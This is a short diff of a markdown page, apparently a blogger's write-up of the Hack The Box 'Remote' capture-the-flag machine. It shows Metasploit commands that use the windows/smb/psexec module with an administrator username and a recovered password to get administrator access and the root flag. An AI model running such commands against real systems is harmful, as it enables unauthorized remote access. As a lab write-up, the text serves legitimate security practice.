raj3shp/raj3shp.github.io/ctf-hackthebox-remote.md

 * It would be too easy I said to myself, but decided to give it a try anyway.
 Fired up msfconsole,

 ```
-use windows/smb/psexec
+msfconsole> use windows/smb/psexec
-SMBUSer administrator
+msfconsole> set SMBUSer administrator
-SMBPass !R3m0te!
+msfconsole> set SMBPass !R3m0te!

+msfconsole> exploit
 ```

 and BAM!
 I could not believe it worked.
-And as easy as that, we get the root flag!
+And as easy as that, we get the administrator access and the root flag!